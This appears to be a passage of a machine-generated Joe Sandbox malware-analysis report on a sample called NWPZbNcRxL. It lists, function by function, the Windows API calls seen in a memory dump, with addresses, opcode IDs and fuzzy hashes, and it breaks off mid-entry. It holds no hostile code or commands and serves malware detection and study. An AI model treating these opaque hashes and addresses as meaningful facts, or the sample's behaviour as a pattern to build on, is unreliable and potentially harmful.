                                                                                                                            • Instruction Fuzzy Hash: D0E09970A92252ABEA24AF65EC0DB0D3BA4BB04B46F10403AF111F10F0CBBA9601CA16
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove$__itow__swprintf
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3253778849-0
                                                                                                                            • Opcode ID: 51945d54c3f8c0ccc4411b98a6fdda64bcd9e1a3578c2feb254a5296041c596c
                                                                                                                            • Instruction ID: 04604ab667922bc0fffed6c63a3065e1bc0978a9118b36a620eb1ddc58e15797
                                                                                                                            • Opcode Fuzzy Hash: 51945d54c3f8c0ccc4411b98a6fdda64bcd9e1a3578c2feb254a5296041c596c
                                                                                                                            • Instruction Fuzzy Hash: B5618C3190065A9BDF01EF60CC91EFE3BA9EF05308F448519F8596B192DB35E945FB50
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22
                                                                                                                              • Part of subcall function 00C90E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C8FDAD,?,?), ref: 00C90E31
                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C902BD
                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C902FD
                                                                                                                            • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00C90320
                                                                                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00C90349
                                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00C9038C
                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00C90399
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4046560759-0
                                                                                                                            • Opcode ID: 969b997c6e97aa446622f3ade32c8040040d12df19073aa06c338337e5c6431b
                                                                                                                            • Instruction ID: cb1689b1c1d403392f0deff67b21974f97448a37ecc781a1a47879fd206b49cf
                                                                                                                            • Opcode Fuzzy Hash: 969b997c6e97aa446622f3ade32c8040040d12df19073aa06c338337e5c6431b
                                                                                                                            • Instruction Fuzzy Hash: 07514D31208204DFCB14EF64C889EAEBBE9FF85314F14491DF455872A2DB31EA45EB52
                                                                                                                            APIs
                                                                                                                            • GetMenu.USER32(?), ref: 00C957FB
                                                                                                                            • GetMenuItemCount.USER32(00000000), ref: 00C95832
                                                                                                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00C9585A
                                                                                                                            • GetMenuItemID.USER32(?,?), ref: 00C958C9
                                                                                                                            • GetSubMenu.USER32(?,?), ref: 00C958D7
                                                                                                                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 00C95928
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Menu$Item$CountMessagePostString
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 650687236-0
                                                                                                                            • Opcode ID: 55a464b496231f1e1fc70c6e3329516f9e4fb19f2b6899d6d4dae967baff7840
                                                                                                                            • Instruction ID: b2606bb537dd488996a4b70ae88a04d0c45e652d691af1d147370759e2ddb51e
                                                                                                                            • Opcode Fuzzy Hash: 55a464b496231f1e1fc70c6e3329516f9e4fb19f2b6899d6d4dae967baff7840
                                                                                                                            • Instruction Fuzzy Hash: 46518031E00615EFDF11EF64C859AAEBBB4EF48310F104069E812BB391CB70AE42DB94
                                                                                                                            APIs
                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00C6EF06
                                                                                                                            • VariantClear.OLEAUT32(00000013), ref: 00C6EF78
                                                                                                                            • VariantClear.OLEAUT32(00000000), ref: 00C6EFD3
                                                                                                                            • _memmove.LIBCMT ref: 00C6EFFD
                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00C6F04A
                                                                                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00C6F078
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1101466143-0
                                                                                                                            • Opcode ID: c5ca9b3a85444bfad6d5e4c6063ac9624a33b0a147a6ccb47e3afed7c18a7fe4
                                                                                                                            • Instruction ID: 2a25cd8c6a8cf9a090aea358ec38e07fc6c0d35fd63a59400c1988ce8ded6bb6
                                                                                                                            • Opcode Fuzzy Hash: c5ca9b3a85444bfad6d5e4c6063ac9624a33b0a147a6ccb47e3afed7c18a7fe4
                                                                                                                            • Instruction Fuzzy Hash: 9B516D75A00209DFCB24CF58D884AAAB7B8FF4C314B15856EE959DB301E734E911CF90
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00C72258
                                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C722A3
                                                                                                                            • IsMenu.USER32(00000000), ref: 00C722C3
                                                                                                                            • CreatePopupMenu.USER32 ref: 00C722F7
                                                                                                                            • GetMenuItemCount.USER32(000000FF), ref: 00C72355
                                                                                                                            • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00C72386
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3311875123-0
                                                                                                                            • Opcode ID: 531fffce25f8e70fe6c9637330b248ba01726a7ffcea0987a54ef1008293d227
                                                                                                                            • Instruction ID: 4501b14afd8da46a016439b61f914d29a9f2916e1e58b8dc4eda28a2ac23d169
                                                                                                                            • Opcode Fuzzy Hash: 531fffce25f8e70fe6c9637330b248ba01726a7ffcea0987a54ef1008293d227
                                                                                                                            • Instruction Fuzzy Hash: 3C51A170600249DFDF25CF68D888BADBBF9FF45318F10C22AE869972A1D3749A45CB51
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C12612: GetWindowLongW.USER32(?,000000EB), ref: 00C12623
                                                                                                                            • BeginPaint.USER32(?,?,?,?,?,?), ref: 00C1179A
                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00C117FE
                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00C1181B
                                                                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00C1182C
                                                                                                                            • EndPaint.USER32(?,?), ref: 00C11876
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1827037458-0
                                                                                                                            • Opcode ID: fcfeb977d9557d34dad68541a120dbd144eacc93a3c78f08b677749312e8f6f9
                                                                                                                            • Instruction ID: 306f11e84f6d526cec73dd9144d55368ce7e2010bf187aa524f23c64f5e4e20c
                                                                                                                            • Opcode Fuzzy Hash: fcfeb977d9557d34dad68541a120dbd144eacc93a3c78f08b677749312e8f6f9
                                                                                                                            • Instruction Fuzzy Hash: 76419F71104700AFD710DF25CC88BAA7BE8FB46724F18462AFAA4C62E1C7349985EB61
                                                                                                                            APIs
                                                                                                                            • ShowWindow.USER32(00CD57B0,00000000,00EF5CD8,?,?,00CD57B0,?,00C9B5A8,?,?), ref: 00C9B712
                                                                                                                            • EnableWindow.USER32(00000000,00000000), ref: 00C9B736
                                                                                                                            • ShowWindow.USER32(00CD57B0,00000000,00EF5CD8,?,?,00CD57B0,?,00C9B5A8,?,?), ref: 00C9B796
                                                                                                                            • ShowWindow.USER32(00000000,00000004,?,00C9B5A8,?,?), ref: 00C9B7A8
                                                                                                                            • EnableWindow.USER32(00000000,00000001), ref: 00C9B7CC
                                                                                                                            • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00C9B7EF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Show$Enable$MessageSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 642888154-0
                                                                                                                            • Opcode ID: 1a67f6db947a06d8143b3e8d7f8fedc9bec728b3f8c48433788458fe5cf24a5e
                                                                                                                            • Instruction ID: a73812fee956039e546eb0aa1847542fafa68b19d280333964a2e60e8f683399
                                                                                                                            • Opcode Fuzzy Hash: 1a67f6db947a06d8143b3e8d7f8fedc9bec728b3f8c48433788458fe5cf24a5e
                                                                                                                            • Instruction Fuzzy Hash: 1C414F34600240BFDF26CFA4E59DB947BE1FF85310F1842A9E9588F6A2C731AD56CB61
                                                                                                                            APIs
                                                                                                                            • GetForegroundWindow.USER32(?,?,?,?,?,?,00C84E41,?,?,00000000,00000001), ref: 00C870AC
                                                                                                                              • Part of subcall function 00C839A0: GetWindowRect.USER32(?,?), ref: 00C839B3
                                                                                                                            • GetDesktopWindow.USER32 ref: 00C870D6
                                                                                                                            • GetWindowRect.USER32(00000000), ref: 00C870DD
                                                                                                                            • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00C8710F
                                                                                                                              • Part of subcall function 00C75244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C752BC
                                                                                                                            • GetCursorPos.USER32(?), ref: 00C8713B
                                                                                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00C87199
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4137160315-0
                                                                                                                            • Opcode ID: 4f25577af867f217957aa3a8e2754f65fea8f59b6a994fedeaa6d8a2d9b0320f
                                                                                                                            • Instruction ID: 8b5c81b3247372ff7625199fdeb93cb4889658cda93f1313f7f587f9feab2863
                                                                                                                            • Opcode Fuzzy Hash: 4f25577af867f217957aa3a8e2754f65fea8f59b6a994fedeaa6d8a2d9b0320f
                                                                                                                            • Instruction Fuzzy Hash: 6F31D272509305ABD720EF14C849B9FB7A9FF88314F100A2EF599D7191D670EA09CB96
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C680A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C680C0
                                                                                                                              • Part of subcall function 00C680A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C680CA
                                                                                                                              • Part of subcall function 00C680A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C680D9
                                                                                                                              • Part of subcall function 00C680A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C680E0
                                                                                                                              • Part of subcall function 00C680A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C680F6
                                                                                                                            • GetLengthSid.ADVAPI32(?,00000000,00C6842F), ref: 00C688CA
                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00C688D6
                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00C688DD
                                                                                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 00C688F6
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00C6842F), ref: 00C6890A
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00C68911
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3008561057-0
                                                                                                                            • Opcode ID: dbc8d2a63a117e18196140a5b6e8dc7092ca3bc778af2df0db463a4bf143bc6e
                                                                                                                            • Instruction ID: 466512cffad7afe3779ecd512423146be1a713b6abbfe99df24bec02af0c13e4
                                                                                                                            • Opcode Fuzzy Hash: dbc8d2a63a117e18196140a5b6e8dc7092ca3bc778af2df0db463a4bf143bc6e
                                                                                                                            • Instruction Fuzzy Hash: E411B131501209FFDB209FA4DC49BBE7768EB45311F10422EE895D7110CB329E19DB60
                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00C685E2
                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00C685E9
                                                                                                                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00C685F8
                                                                                                                            • CloseHandle.KERNEL32(00000004), ref: 00C68603
                                                                                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C68632
                                                                                                                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 00C68646
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1413079979-0
                                                                                                                            • Opcode ID: 34150b4bb1248cdc472e057d7d0428870e47a9a2e63255bb1c527ac176389de3
                                                                                                                            • Instruction ID: bc1a9d28906b1e17f46fa6fa3b99c1ac3b27126b8c84dd154812414fd47e76ff
                                                                                                                            • Opcode Fuzzy Hash: 34150b4bb1248cdc472e057d7d0428870e47a9a2e63255bb1c527ac176389de3
                                                                                                                            • Instruction Fuzzy Hash: 25115C72500209ABDF128FA4DD89BDE7BA9EF08344F044169FE05E2160C771CE65DB60
                                                                                                                            APIs
                                                                                                                            • GetDC.USER32(00000000), ref: 00C6B7B5
                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 00C6B7C6
                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C6B7CD
                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00C6B7D5
                                                                                                                            • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00C6B7EC
                                                                                                                            • MulDiv.KERNEL32(000009EC,?,?), ref: 00C6B7FE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CapsDevice$Release
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1035833867-0
                                                                                                                            • Opcode ID: 20f121ce859262df488d2d61bbae485b84aa926104b8d9390780cf6356d82d1d
                                                                                                                            • Instruction ID: 245994fc5b8c9c62ec0e81377a31940e2e9792dfe2fd37758835d6f0fa29e806
                                                                                                                            • Opcode Fuzzy Hash: 20f121ce859262df488d2d61bbae485b84aa926104b8d9390780cf6356d82d1d
                                                                                                                            • Instruction Fuzzy Hash: 20018875E00309BBEB105BA69C49B5EBFB8EB48311F004076FA04E7291D6309D11CFA0
                                                                                                                            APIs
                                                                                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C30193
                                                                                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00C3019B
                                                                                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C301A6
                                                                                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C301B1
                                                                                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 00C301B9
                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C301C1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4278518827-0
                                                                                                                            • Opcode ID: fc17ef7a635e52380f69e357eda00edf8ed1988be418d017a0495cfcdae8468b
                                                                                                                            • Instruction ID: 89d85e25152b73394363d44d3913847edf830fd37ea548ee8650d962df9a37a7
                                                                                                                            • Opcode Fuzzy Hash: fc17ef7a635e52380f69e357eda00edf8ed1988be418d017a0495cfcdae8468b
                                                                                                                            • Instruction Fuzzy Hash: 4E0148B09017597DE3008F5A8C85B56FEB8FF19354F00415BA15887941C7B5A864CBE5
                                                                                                                            APIs
                                                                                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00C753F9
                                                                                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00C7540F
                                                                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 00C7541E
                                                                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C7542D
                                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C75437
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C7543E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                            • String ID:
